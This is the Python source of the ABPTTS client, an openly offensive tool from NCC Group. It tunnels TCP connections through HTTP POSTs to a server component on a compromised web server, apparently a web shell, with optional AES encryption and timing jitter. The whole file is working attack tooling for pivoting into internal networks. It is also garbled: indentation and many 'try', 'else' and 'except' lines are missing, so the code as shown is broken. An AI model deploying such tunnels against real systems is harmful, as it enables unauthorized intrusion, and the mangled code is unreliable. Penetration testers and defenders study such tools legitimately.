#!/usr/bin/env python
# This file is part of A Black Path Toward The Sun ("ABPTTS")
# Copyright 2016 NCC Group
# A Black Path Toward The Sun ("ABPTTS") is free software: you can redistribute it and/or modify
# it under the terms of version 2 of the GNU General Public License as published by
# the Free Software Foundation.
# A Black Path Toward The Sun ("ABPTTS") is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with A Black Path Toward The Sun ("ABPTTS") (in the file license.txt).
# If not, see <http://www.gnu.org/licenses/>.
# Version 1.0
# Ben Lincoln, NCC Group
# 2016-07-30
# Client component of A Black Path Toward The Sun
# it is very likely that you will need to install the httplib2 and pycrypto Python libraries to use ABPTTS.
# e.g.:
# pip install httplib2
# pip install pycrypto
# pycrypto may require the installation of additional OS-level packages to obtain the Python headers, e.g. on Debian:
# apt-get install python-dev
# ...or on Windows, download and install https://www.microsoft.com/en-us/download/details.aspx?id=44266
import base64
import binascii
import httplib2
import inspect
import math
#import multiprocessing
import os
import random
import re
import sys
import socket
import thread
#import threading
import time
import urllib
import libabptts
from Crypto.Cipher import AES
from datetime import datetime, date, tzinfo, timedelta
outputHandler = libabptts.OutputHandler()
conf = libabptts.ABPTTSConfiguration(outputHandler)
# \\\\\\ Do not modify below this line unless you know what you're doing! //////
socketTimeoutCurrent = 1.0
clientSocketTimeoutVariationNeg = 0.0
httpConnectionTimeout = 10.0
httpRequestRetryLimit = 12
httpRequestRetryDelay = 5.0
unsafeTLSMode = False
runServer = 1
clientToServerBuffer = ""
responseStringWrapperText = []
encryptionKey = []
dataBlockNameValueSeparator = ""
dataBlockParamSeparator = ""
encryptionBlockSize = 16
def showBanner():
outputHandler.outputMessage("---===[[[ A Black Path Toward The Sun ]]]===---")
outputHandler.outputMessage(" --==[[ - Client - ]]==--")
outputHandler.outputMessage(" Ben Lincoln, NCC Group")
outputHandler.outputMessage(' Version %s - %s' % (libabptts.ABPTTSVersion.GetVersionString(), libabptts.ABPTTSVersion.GetReleaseDateString()))
def pad(s, blockSize):
return s + (blockSize - len(s) % blockSize) * chr(blockSize - len(s) % blockSize)
def unpad(s):
return s[:-ord(s[len(s)-1:])]
def encrypt(plaintext, key, blockSize):
iv = bytearray(os.urandom(blockSize))
iv = str(iv)
reIV = bytearray(os.urandom(blockSize))
reIV = str(reIV)
rivPlaintext = pad(reIV + str(plaintext), blockSize)
#print "rivPlaintext: " + base64.b64encode(rivPlaintext)
cipher = AES.new(key, AES.MODE_CBC, IV=iv)
return iv + str(cipher.encrypt(rivPlaintext))
def decrypt(ciphertext, key, blockSize):
#print "ciphertext: " + base64.b64encode(ciphertext)
iv = ciphertext[0:blockSize]
#print "iv: " + base64.b64encode(iv)
#print "ciphertext: " + base64.b64encode(ciphertext)
rivCiphertext = ciphertext[blockSize:]
#print "rivCiphertext: " + base64.b64encode(rivCiphertext)
rivCiphertext = str(rivCiphertext)
#print "rivCiphertext: " + base64.b64encode(rivCiphertext)
cipher = AES.new(key, AES.MODE_CBC, IV=iv)
rivPlaintext = cipher.decrypt(rivCiphertext)
#print "rivPlaintext: " + base64.b64encode(rivPlaintext)
rivPlaintext = str(rivPlaintext)
#print "rivPlaintext: " + base64.b64encode(rivPlaintext)
rivPlaintext = unpad(rivPlaintext)
#print "rivPlaintext: " + base64.b64encode(rivPlaintext)
#rivPlaintext = str(cipher.decrypt(str(rivCiphertext)))
#print "rivPlaintext: " + base64.b64encode(rivPlaintext)
#print "rivPlaintext: " + base64.b64encode(rivPlaintext[blockSize:])
return rivPlaintext[blockSize:]
#return rivPlaintext
def outputTunnelIOMessage(direction, clientAddress, listeningAddress, serverAddress, connectionID, category, message):
result = '[(%s)' % (direction)
if direction == "S2C":
result = '%s %s -> %s -> %s' % (result, serverAddress, listeningAddress, clientAddress)
result = '%s %s -> %s -> %s' % (result, clientAddress, listeningAddress, serverAddress)
if connectionID != None:
if connectionID.strip() != "":
result = '%s (Connection ID: %s)' % (result, connectionID)
if category != None:
if category.strip() != "":
result = '%s (%s)' % (result, category)
result = '%s]: %s' % (result, message)
def getServerResponseFromResponseBody(responseBody, wrapperTextArray, formattedServerAddress, formattedClientAddress, listeningAddress, connectionID):
result = responseBody.strip()
for wt in wrapperTextArray:
result = result.replace(wt, "")
result = result.strip()
if conf.echoHTTPBody:
outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, 'HTTP Response Body', '%s%s' % (os.linesep, responseBody))
outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, 'HTTP Response Body Without Wrapper Text', '%s%s' % (os.linesep, result))
return result
def getCookieFromServerResponse(connectionID, currentCookie, serverResponse):
newCookie = currentCookie
if 'set-cookie' in serverResponse:
newCookie = serverResponse['set-cookie']
if connectionID.strip() != "":
outputHandler.outputMessage('[Connection ID %s]: Server set cookie %s' % (connectionID, newCookie))
outputHandler.outputMessage('Server set cookie %s' % (newCookie))
newCookie = currentCookie
return newCookie
def child(clientsock, clientAddr, listeningAddress, forwardingURL, destAddress, destPort):
global clientToServerBuffer
global socketTimeoutCurrent
formattedServerAddress = '%s:%s' % (destAddress, destPort)
formattedClientAddress = '%s:%s' % (clientAddr[0], clientAddr[1])
socketTimeoutCurrent = conf.clientSocketTimeoutBase
closeConnections = 0
runChildLoop = 1
if conf.accessKeyMode == "header":
headers = {'User-Agent': conf.headerValueUserAgent, 'Content-type': 'application/x-www-form-urlencoded', conf.headerNameKey: conf.headerValueKey, 'Connection': 'close'}
headers = {'User-Agent': conf.headerValueUserAgent, 'Content-type': 'application/x-www-form-urlencoded', 'Connection': 'close'}
connectionID = ""
cookieVal = ""
body = {}
http = httplib2.Http(timeout=httpConnectionTimeout, disable_ssl_certificate_validation=unsafeTLSMode)
response = ""
content = ""
cookieVal = ""
outputHandler.outputMessage('Connecting to %s:%i via %s' % (destAddress, destPort, forwardingURL))
plaintextMessage = conf.paramNameOperation + dataBlockNameValueSeparator + conf.opModeStringOpenConnection + dataBlockParamSeparator + conf.paramNameDestinationHost + dataBlockNameValueSeparator + destAddress + dataBlockParamSeparator + conf.paramNameDestinationPort + dataBlockNameValueSeparator + str(destPort)
if len(encryptionKey) > 0:
#plaintextMessage = conf.paramNameOperation + dataBlockNameValueSeparator + conf.opModeStringOpenConnection + dataBlockParamSeparator + conf.paramNameDestinationHost + dataBlockNameValueSeparator + destAddress + dataBlockParamSeparator + conf.paramNameDestinationPort + dataBlockNameValueSeparator + str(destPort)
#print "Plaintext message: " + plaintextMessage
ciphertextMessage = base64.b64encode(encrypt(plaintextMessage, str(encryptionKey), encryptionBlockSize))
if conf.accessKeyMode == "header":
body = {conf.paramNameEncryptedBlock: ciphertextMessage }
body = {conf.paramNameAccessKey: conf.headerValueKey, conf.paramNameEncryptedBlock: ciphertextMessage }
# body = {conf.paramNameOperation: conf.opModeStringOpenConnection, conf.paramNameDestinationHost: destAddress, conf.paramNameDestinationPort: destPort }
plaintextMessage = base64.b64encode(plaintextMessage)
if conf.accessKeyMode == "header":
body = {conf.paramNamePlaintextBlock: plaintextMessage }
body = {conf.paramNameAccessKey: conf.headerValueKey, conf.paramNamePlaintextBlock: plaintextMessage }
encodedBody = urllib.urlencode(body)
if conf.echoHTTPBody:
outputTunnelIOMessage('C2S', formattedClientAddress, listeningAddress, formattedServerAddress, '', 'HTTP Request Body', '%s%s' % (os.linesep, encodedBody))
http = httplib2.Http(timeout=httpConnectionTimeout, disable_ssl_certificate_validation=unsafeTLSMode)
response, content = http.request(forwardingURL, 'POST', headers=headers, body=encodedBody)
content = getServerResponseFromResponseBody(content, responseStringWrapperText, formattedServerAddress, formattedClientAddress, listeningAddress, connectionID)
cookieVal = getCookieFromServerResponse(connectionID, cookieVal, response)
headers['Cookie'] = cookieVal
if conf.responseStringConnectionCreated in content:
responseArray = content.split(" ")
if len(responseArray) > 1:
connectionID = responseArray[1]
outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'Server created connection ID %s' % (connectionID))
runChildLoop = 0
outputHandler.outputMessage('Error: could not create connection. Raw server response: ' + content)
iterationCounter = 0
clientSentByteCounter = 0
serverSentByteCounter = 0
clientHasClosedConnection = False
while runChildLoop == 1:
clientMessageB64 = ""
serverMessageB64 = ""
content = ""
scaleSocketTimeoutUp = False
scaleSocketTimeoutDown = False
clientSocketTimedOut = False
trafficSent = False
if clientHasClosedConnection == False:
currentFromClient = clientsock.recv(conf.clientSocketBufferSize)
if currentFromClient:
clientToServerBuffer += currentFromClient
clientHasClosedConnection = True
except socket.error as e:
if "timed out" not in str(e):
raise e
clientSocketTimedOut = True
c2sBufferLength = len(clientToServerBuffer)
if c2sBufferLength > 0:
trafficSent = True
toServerByteCount = conf.clientToServerBlockSize
if toServerByteCount > c2sBufferLength:
toServerByteCount = c2sBufferLength
fromClient = ""
if toServerByteCount < c2sBufferLength:
fromClient = clientToServerBuffer[0:toServerByteCount]
clientToServerBuffer = clientToServerBuffer[toServerByteCount:]
fromClient = clientToServerBuffer[:]
clientToServerBuffer = ""
clientSentByteCounter = clientSentByteCounter + len(fromClient)
clientMessageB64 = base64.b64encode(fromClient)
if conf.echoDebugMessages:
outputTunnelIOMessage('C2S', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', '%s%i bytes' % (os.linesep, len(fromClient)))
if conf.echoData:
outputTunnelIOMessage('C2S', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, 'Raw Data (Plaintext) (base64)', '%s%s' % (os.linesep, clientMessageB64))
if clientHasClosedConnection:
outputTunnelIOMessage('C2S', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'Client closed channel')
clientMessageB64 = ""
runChildLoop = 0
closeConnections = 1
plaintextMessage = conf.paramNameOperation + dataBlockNameValueSeparator + conf.opModeStringSendReceive + dataBlockParamSeparator + conf.paramNameConnectionID + dataBlockNameValueSeparator + connectionID + dataBlockParamSeparator + conf.paramNameData + dataBlockNameValueSeparator + clientMessageB64
if len(encryptionKey) > 0:
#plaintextMessage = conf.paramNameOperation + dataBlockNameValueSeparator + conf.opModeStringSendReceive + dataBlockParamSeparator + conf.paramNameConnectionID + dataBlockNameValueSeparator + connectionID + dataBlockParamSeparator + conf.paramNameData + dataBlockNameValueSeparator + clientMessageB64
ciphertextMessage = base64.b64encode(encrypt(plaintextMessage, str(encryptionKey), encryptionBlockSize))
if conf.echoData:
outputTunnelIOMessage('C2S', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, 'Raw Data (Encrypted) (base64)', '%s%s' % (os.linesep, ciphertextMessage))
if conf.accessKeyMode == "header":
body = {conf.paramNameEncryptedBlock: ciphertextMessage }
body = {conf.paramNameAccessKey: conf.headerValueKey, conf.paramNameEncryptedBlock: ciphertextMessage }
#body = {conf.paramNameOperation: conf.opModeStringSendReceive, conf.paramNameConnectionID: connectionID, conf.paramNameData: clientMessageB64 }
plaintextMessage = base64.b64encode(plaintextMessage)
if conf.accessKeyMode == "header":
body = {conf.paramNamePlaintextBlock: plaintextMessage }
body = {conf.paramNameAccessKey: conf.headerValueKey, conf.paramNamePlaintextBlock: plaintextMessage }
encodedBody = urllib.urlencode(body)
if conf.echoHTTPBody:
outputTunnelIOMessage('C2S', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, 'HTTP Request Body', '%s%s' % (os.linesep, encodedBody))
response = []
madeRequest = False
httpRetryCount = 0
while madeRequest == False:
response, content = http.request(forwardingURL, 'POST', headers=headers, body=encodedBody)
madeRequest = True
except Exception as e:
httpRetryCount += 1
if httpRetryCount > httpRequestRetryLimit:
outputTunnelIOMessage('C2S', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'Error - HTTP request retry limit of %i has been reached, and this request will not be retried. Final error was: %s' % (httpRequestRetryLimit, e))
madeRequest = True
outputTunnelIOMessage('C2S', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'Error - HTTP request failed with the following message: %s. This request will be retried up to %i times.' % (e, httpRequestRetryLimit))
content = getServerResponseFromResponseBody(content, responseStringWrapperText, formattedServerAddress, formattedClientAddress, listeningAddress, connectionID)
cookieVal = getCookieFromServerResponse(connectionID, cookieVal, response)
headers['Cookie'] = cookieVal
except Exception as e:
raise e
serverClosedConnection = False
srb = getServerResponseFromResponseBody(content, responseStringWrapperText, formattedServerAddress, formattedClientAddress, listeningAddress, connectionID)
#print '"' + srb + '"'
srbArray = srb.split(" ", 1)
fromServer = ""
if len(srbArray) > 1:
if srbArray[0] == conf.responseStringData:
fromServerB64 = srbArray[1]
fromServer = base64.b64decode(fromServerB64)
if len(encryptionKey) > 0:
if conf.echoData:
outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, 'Raw Data (Encrypted) (base64)', '%s%s' % (os.linesep, fromServerB64))
fromServer = decrypt(fromServer, str(encryptionKey), encryptionBlockSize)
#print '"' + fromServer + '"'
if conf.echoData:
outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, 'Raw Data (Plaintext) (base64)', '%s%s' % (os.linesep, fromServerB64))
fullMessageSize = len(fromServer)
numBlocks = int(math.ceil(float(fullMessageSize) / float(conf.clientBlockSizeLimitFromServer)))
if conf.echoDebugMessages:
if numBlocks > 1:
outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'Splitting large block (%i bytes) into %i blocks for relay to client' % (fullMessageSize, numBlocks))
for blockNum in range(0, numBlocks):
firstByte = blockNum * conf.clientBlockSizeLimitFromServer
lastByte = (blockNum + 1) * conf.clientBlockSizeLimitFromServer
if lastByte > fullMessageSize:
lastByte = fullMessageSize
currentBlock = fromServer[firstByte:lastByte]
serverSentByteCounter = serverSentByteCounter + len(currentBlock)
if conf.echoData:
outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, 'Raw Data (Plaintext) (base64)', '%s%s' % (os.linesep, base64.b64encode(currentBlock)))
if conf.echoDebugMessages:
outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', '(Block %i/%i) %i bytes' % (blockNum + 1, numBlocks, len(currentBlock)))
except Exception as e:
outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'Error sending to client - %s' % (e))
if conf.clientBlockTransmitSleepTime > 0.0:
if blockNum < (numBlocks - 1):
foundResponseType = False
if srb == conf.responseStringNoData:
foundResponseType = True
if conf.echoDebugMessages:
outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'No data to receive from server at this time')
trafficSent = True
if srb == conf.responseStringErrorInvalidRequest:
outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server reported that the request was invalid. Verify that that you are using a client configuration compatible with the server-side component.')
foundResponseType = True
if srb == conf.responseStringErrorConnectionOpenFailed:
outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server reported that the requested connection could not be opened. You may have requested a destination host/port that is inaccessible to the server, the server may have exhausted ephemeral ports (although this is unlikely), or another component (e.g. firewall) may be interfering with connectivity.')
foundResponseType = True
if srb == conf.responseStringErrorConnectionSendFailed:
outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server reported that an error occurred while sending data over the TCP connection.')
foundResponseType = True
if srb == conf.responseStringErrorConnectionReceiveFailed:
outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server reported that an error occurred while receiving data over the TCP connection.')
foundResponseType = True
if srb == conf.responseStringErrorDecryptFailed:
outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server reported a decryption failure. Verify that the encryption keys in the client and server configurations match.')
foundResponseType = True
if srb == conf.responseStringErrorEncryptFailed:
outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server reported an encryption failure. Verify that the encryption keys in the client and server configurations match.')
foundResponseType = True
if srb == conf.responseStringErrorEncryptionNotSupported:
outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server reported that it does not support encryption. Verify that that you are using a client configuration compatible with the server-side component.')
foundResponseType = True
if foundResponseType == False:
outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'Unexpected response from server: %s' % (content))
serverClosedConnection = True
if conf.responseStringConnectionClosed in content:
outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server explicitly closed connection ID %s' % (connectionID))
serverClosedConnection = True
if conf.responseStringErrorConnectionNotFound in content:
outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server reported that connection ID %s was not found - assuming connection has been closed.' % (connectionID))
serverClosedConnection = True
except socket.error as e:
if "timed out" not in str(e):
raise e
if trafficSent:
scaleSocketTimeoutDown = True
scaleSocketTimeoutUp = False
scaleSocketTimeoutDown = False
scaleSocketTimeoutUp = True
if serverClosedConnection == True:
runChildLoop = 0
closeConnections = 1
responseArray = content.split(" ")
if len(responseArray) > 1:
connectionID = responseArray[1]
outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server closed connection ID %s' % (connectionID))
outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server closed connection ID %s without specifying its ID' % (connectionID))
outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', 'The server closed connection ID %s without sending a response' % (connectionID))
iterationCounter = iterationCounter + 1
if iterationCounter > conf.statsUpdateIterations:
outputTunnelIOMessage('C2S', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', '%i bytes sent since last report' % (clientSentByteCounter))
outputTunnelIOMessage('S2C', formattedClientAddress, listeningAddress, formattedServerAddress, connectionID, '', '%i bytes sent since last report' % (serverSentByteCounter))
iterationCounter = 0
clientSentByteCounter = 0
serverSentByteCounter = 0
if runServer == 0:
outputHandler.outputMessage('Server shutdown request received in thread for connection ID %s' % (connectionID))
runChildLoop = 0
closeConnections = 1
if conf.autoscaleClientSocketTimeout:
# scale socket timeout up/down if the criteria for doing so was met
timeoutChange = 0.0
#global socketTimeoutCurrent
newSocketTimeout = socketTimeoutCurrent
if scaleSocketTimeoutDown or scaleSocketTimeoutUp:
timeoutChange = conf.clientSocketTimeoutScalingMultiplier * socketTimeoutCurrent
if scaleSocketTimeoutDown:
newSocketTimeout = conf.clientSocketTimeoutMin
if scaleSocketTimeoutUp:
newSocketTimeout = socketTimeoutCurrent + timeoutChange
# make sure socket timeout is within specified range
if newSocketTimeout < conf.clientSocketTimeoutMin:
newSocketTimeout = conf.clientSocketTimeoutMin
if newSocketTimeout > conf.clientSocketTimeoutMax:
newSocketTimeout = conf.clientSocketTimeoutMax
if newSocketTimeout != socketTimeoutCurrent:
if conf.echoDebugMessages:
outputHandler.outputMessage('[Connection ID %s]: Client-side socket timeout has been changed from %f to %f' % (connectionID, socketTimeoutCurrent, newSocketTimeout))
socketTimeoutCurrent = newSocketTimeout
# apply random socket timeout variation
timeoutVar = random.uniform(clientSocketTimeoutVariationNeg, conf.clientSocketTimeoutVariation)
timeoutModifier = (socketTimeoutCurrent * timeoutVar)
effectiveTimeout = (socketTimeoutCurrent + timeoutModifier)
if conf.echoDebugMessages:
outputHandler.outputMessage('[Connection ID %s]: Applying random variation of %f to client-side socket timeout for this iteration - timeout will be %f' % (connectionID, timeoutModifier, effectiveTimeout))
except Exception as e:
outputHandler.outputMessage('Connection-level exception: %s in thread for tunnel (%s -> %s -> %s)' % (e, formattedClientAddress, listeningAddress, formattedServerAddress))
closeConnections = 1
runChildLoop = 0
if closeConnections == 1:
outputHandler.outputMessage('Disengaging tunnel (%s -> %s -> %s)' % (formattedClientAddress, listeningAddress, formattedServerAddress))
outputHandler.outputMessage('Closing client socket (%s -> %s)' % (formattedClientAddress, listeningAddress))
except Exception as e2:
outputHandler.outputMessage('Exception while closing client socket (%s -> %s): %s' % (formattedClientAddress, listeningAddress, e2))
plaintextMessage = conf.paramNameOperation + dataBlockNameValueSeparator + conf.opModeStringCloseConnection + dataBlockParamSeparator + conf.paramNameConnectionID + dataBlockNameValueSeparator + connectionID
if len(encryptionKey) > 0:
#plaintextMessage = conf.paramNameOperation + dataBlockNameValueSeparator + conf.opModeStringCloseConnection + dataBlockParamSeparator + conf.paramNameConnectionID + dataBlockNameValueSeparator + connectionID
ciphertextMessage = base64.b64encode(encrypt(plaintextMessage, str(encryptionKey), encryptionBlockSize))
if conf.accessKeyMode == "header":
body = {conf.paramNameEncryptedBlock: ciphertextMessage }
body = {conf.paramNameAccessKey: conf.headerValueKey, conf.paramNameEncryptedBlock: ciphertextMessage }
#body = {conf.paramNameOperation: conf.opModeStringCloseConnection, conf.paramNameConnectionID: connectionID }
plaintextMessage = base64.b64encode(plaintextMessage)
if conf.accessKeyMode == "header":
body = {conf.paramNamePlaintextBlock: plaintextMessage }
body = {conf.paramNameAccessKey: conf.headerValueKey, conf.paramNamePlaintextBlock: plaintextMessage }
http = httplib2.Http(timeout=httpConnectionTimeout, disable_ssl_certificate_validation=unsafeTLSMode)
response, content = http.request(forwardingURL, 'POST', headers=headers, body=urllib.urlencode(body))
content = getServerResponseFromResponseBody(content, responseStringWrapperText, formattedServerAddress, formattedClientAddress, listeningAddress, connectionID)
cookieVal = getCookieFromServerResponse(connectionID, cookieVal, response)
headers['Cookie'] = cookieVal
if conf.responseStringConnectionClosed in content:
responseArray = content.split(" ")
if len(responseArray) > 1:
connectionID = responseArray[1]
outputHandler.outputMessage('Server closed connection ID %s' % (connectionID))
outputHandler.outputMessage('Error: could not close connection ID %s (may have already been closed on the server). Raw server response: %s' % (connectionID, content))
outputHandler.outputMessage("Unexpected state: child loop exited without closeConnections being set to 1")
except Exception as bigE:
outputHandler.outputMessage("High-level exception: %s" % (str(bigE)))
def StartListener(forwardingURL, localAddress, localPort, destAddress, destPort):
#formattedAddress = str(localAddress) + ":" + str(localPort)
formattedAddress = '%s:%s' % (localAddress, localPort)
myserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
myserver.bind((localAddress, localPort))
#outputHandler.outputMessage('Server started')
outputHandler.outputMessage('Listener ready to forward connections from %s to %s:%i via %s' % (formattedAddress, destAddress, destPort, forwardingURL))
while runServer > 0:
outputHandler.outputMessage('Waiting for client connection to %s' % (formattedAddress))
client, addr = myserver.accept()
outputHandler.outputMessage('Client connected to %s' %(formattedAddress))
thread.start_new_thread(child, (client, addr, formattedAddress, forwardingURL, destAddress, destPort))
except Exception as e:
if "Closing connections" not in str(e):
raise e
except Exception as e:
outputHandler.outputMessage('Error in listener on %s: %s' % (formattedAddress, e))
outputHandler.outputMessage('Shutting down listener on %s' % (formattedAddress))
def ShowUsage():
print os.linesep
print 'Example: %s -c CONFIG_FILE_1 -u https://vulnerableserver/EStatus/ -f' % (sys.argv[0])
print os.linesep
print 'Example: %s -c CONFIG_FILE_1 -c CONFIG_FILE_2 -u https://vulnerableserver/EStatus/ -f -f -f' % (sys.argv[0])
print os.linesep
print 'Data from configuration files is applied in sequential order, to allow partial customization files to be overlayed on top of more complete base files.'
print os.linesep
print 'IE if the same parameter is defined twice in the same file, the later value takes precedence, and if it is defined in two files, the value in whichever file is specified last on the command line takes precedence.'
print os.linesep
print '--debug will enable verbose output.'
print os.linesep
print '--unsafetls will disable TLS/SSL certificate validation when connecting to the server, if the connection is over HTTPS'
# logging-related options not mentioned because file output is buggy - just redirect stdout to a file instead
#print os.linesep
#print '--log LOGFILEPATH will cause all output to be written to the specified file (as well as the console, unless --quiet is also specified).'
#print os.linesep
#print '--quiet will suppress console output (but still allow log file output if that option is enabled).'
def SplitOnLast(inputString, splitCharacter):
result = []
splitCharPosition = inputString.rfind(splitCharacter)
#print "Split character position: %i" % splitCharPosition
#print inputString[:splitCharPosition]
#print inputString[(splitCharPosition + 1):]
if splitCharPosition > 0:
result.append(inputString[(splitCharPosition + 1):])
return result
if __name__=='__main__':
if len(sys.argv) < 5:
forwardingURL = ""
forwardingConfigurationList = []
configFileList = []
cliLogFileLocation = ""
cliDebugOutput = False
cliQuietOutput = False
basePath = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
args2 = []
argNum = 0
while argNum < len(sys.argv):
currentArg = sys.argv[argNum]
foundArg = False
if argNum < (len(sys.argv) - 1):
nextArg = sys.argv[argNum + 1]
if currentArg == "-c":
foundArg = True
#configFileList = nextArg.split(",")
if foundArg == False:
if currentArg == "-u":
foundArg = True
forwardingURL = nextArg
if foundArg == False:
if currentArg == "-f":
foundArg = True
#forwardingConfigurationList = nextArg.split(",")
if foundArg == False:
if currentArg == "--log":
foundArg = True
cliLogFileLocation = nextArg
if foundArg:
argNum += 2
if foundArg == False:
argNum += 1
# this is done twice to cause these settings to apply for all output...
if cliLogFileLocation != "":
conf.writeToLog = True
conf.logFilePath = cliLogFileLocation
for a in args2:
if a == "--debug":
conf.echoDebugMessages = True
if a == "--unsafetls":
unsafeTLSMode = True
outputHandler.outputMessage('WARNING: The current configuration ignores TLS/SSL certificate validation errors for connection to the server component. This increases the risk of the communication channel being intercepted or tampered with.')
#if a == "--quiet":
# conf.writeToStandardOut = False
parameterFileArray = []
parameterFileArray.append(os.path.join(basePath, 'data', 'settings-default.txt'))
parameterFileArray.append(os.path.join(basePath, 'data', 'settings-fallback.txt'))
for cf in configFileList:
if conf.echoDebugMessages:
conf.LoadParameters(parameterFileArray, True)
conf.LoadParameters(parameterFileArray, False)
# only compute this once
#global clientSocketTimeoutVariationNeg
clientSocketTimeoutVariationNeg = conf.clientSocketTimeoutVariation * -1.0
# Handle not only the "normal" prefix/suffix blocks, but also any variations created
# by "helpful" servers, e.g. Apache Tomcat, which transparently strips
# \r characters from output
#global responseStringWrapperText
responseStringWrapperText = []
responseStringPrefix = base64.b64decode(conf.responseStringPrefixB64)
responseStringWrapperText.append(responseStringPrefix.replace("\r", ""))
responseStringSuffix = base64.b64decode(conf.responseStringSuffixB64)
responseStringWrapperText.append(responseStringSuffix.replace("\r", ""))
#global dataBlockNameValueSeparator
#global dataBlockParamSeparator
dataBlockNameValueSeparator = base64.b64decode(conf.dataBlockNameValueSeparatorB64)
dataBlockParamSeparator = base64.b64decode(conf.dataBlockParamSeparatorB64)
#socketTimeoutCurrent = clientSocketTimeoutBase
#global encryptionKey
encryptionKey = []
encryptedTraffic = False
if len(conf.encryptionKeyHex) > 0:
encryptionKey = binascii.unhexlify(conf.encryptionKeyHex)
encryptedTraffic = True
encryptionKey = []
if encryptedTraffic == False:
outputHandler.outputMessage('WARNING: The current configuration DOES NOT ENCRYPT tunneled traffic. If you wish to use symmetric encryption, restart this utility with a configuration file which defines a valid encryption key.')
# ...as well as override contrary values in the settings file(s)
if cliLogFileLocation != "":
conf.writeToLog = True
conf.logFilePath = cliLogFileLocation
for a in args2:
if a == "--debug":
conf.echoDebugMessages = True
if conf.echoDebugMessages:
if forwardingURL == "":
outputHandler.outputMessage('Error: no ABPTTS forwarding URL was specified. This utility will now exit.')
forwarderCount = 0
for fw in forwardingConfigurationList:
parsedMap = False
forwardingConfigurationString1 = fw.split("/")
if len(forwardingConfigurationString1) > 1:
#forwardingConfigurationString1a = forwardingConfigurationString1[0].split(":")
#forwardingConfigurationString1b = forwardingConfigurationString1[1].split(":")
forwardingConfigurationString1a = SplitOnLast(forwardingConfigurationString1[0], ":")
forwardingConfigurationString1b = SplitOnLast(forwardingConfigurationString1[1], ":")
if len(forwardingConfigurationString1a) > 1:
if len(forwardingConfigurationString1b) > 1:
localAddress = forwardingConfigurationString1a[0]
localPortString = forwardingConfigurationString1a[1]
destAddress = forwardingConfigurationString1b[0]
destPortString = forwardingConfigurationString1b[1]
#print "Local address: %s" % localAddress
#print "Local port: %s" % localPortString
#print "Dest address: %s" % destAddress
#print "Dest port: %s" % destPortString
localPort = int(localPortString)
print "Could not parse a local port number as an integer"
destPort = int(destPortString)
print "Could not parse a destination port number as an integer"
parsedMap = True
# parsedMap = False
if parsedMap:
thread.start_new_thread(StartListener, (forwardingURL, localAddress, localPort, destAddress, destPort))
forwarderCount += 1
print "Could not map the input parameter '%s' to a source/destination host/port definition" % (fw)
if forwarderCount == 0:
outputHandler.outputMessage('Error: no valid port-forwarding definitions were specified. This utility will now exit.')
while 1:
except KeyboardInterrupt:
outputHandler.outputMessage('Console operator terminated server')
runServer = 0
outputHandler.outputMessage('Server shutdown')
if conf.writeToLog:
outputHandler.outputMessage('Please wait - writing remaining log output buffer to disk')
runLoggingThread = 0
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